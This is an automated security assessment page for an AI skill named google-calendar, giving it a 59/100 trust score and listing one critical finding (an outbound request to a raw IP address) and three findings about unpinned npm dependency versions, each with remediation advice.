Trust Assessment
google-calendar received a trust score of 59/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 4 findings: 1 critical, 0 high, 1 medium, and 2 low severity. Key findings include Network egress to untrusted endpoints, Unpinned npm dependency version, Unpinned dependency version in package.json.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. All layers scored 70 or above, reflecting consistent security practices.
Last analyzed on February 14, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings4
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Network egress to untrusted endpoints HTTP request to raw IP address Review all outbound network calls. Remove connections to webhook collectors, paste sites, and raw IP addresses. Legitimate API calls should use well-known service domains. | Manifest | skills/sheldenshi/google-calendar-2/scripts/auth.ts:271 | |
| MEDIUM | Unpinned npm dependency version Dependency 'open' is not pinned to an exact version ('^10.1.0'). Pin dependencies to exact versions to reduce drift and supply-chain risk. | Dependencies | skills/sheldenshi/google-calendar-2/scripts/package.json | |
| LOW | Unpinned dependency version in package.json The 'open' dependency in 'scripts/package.json' uses a caret (^) version range, allowing minor and patch updates. While 'package-lock.json' pins the exact version, a fresh install without the lockfile could pull a newer, potentially vulnerable or incompatible version. It is recommended to pin dependencies to exact versions for better supply chain security and reproducibility. Pin the 'open' dependency to an exact version (e.g., "open": "10.1.0") or use a tilde (~) range for patch updates only. | LLM | scripts/package.json:10 | |
| LOW | Unpinned dev dependency version in package.json The '@types/node' dev dependency in 'scripts/package.json' uses a caret (^) version range, allowing minor and patch updates. While 'package-lock.json' pins the exact version, a fresh install without the lockfile could pull a newer, potentially vulnerable or incompatible version. It is recommended to pin dependencies to exact versions for better supply chain security and reproducibility. Pin the '@types/node' dev dependency to an exact version (e.g., "@types/node": "25.2.1") or use a tilde (~) range for patch updates only. | LLM | scripts/package.json:13 |
Scan History
Embed Code
[](https://skillshield.io/report/dd93e06ff121f843)
Powered by SkillShield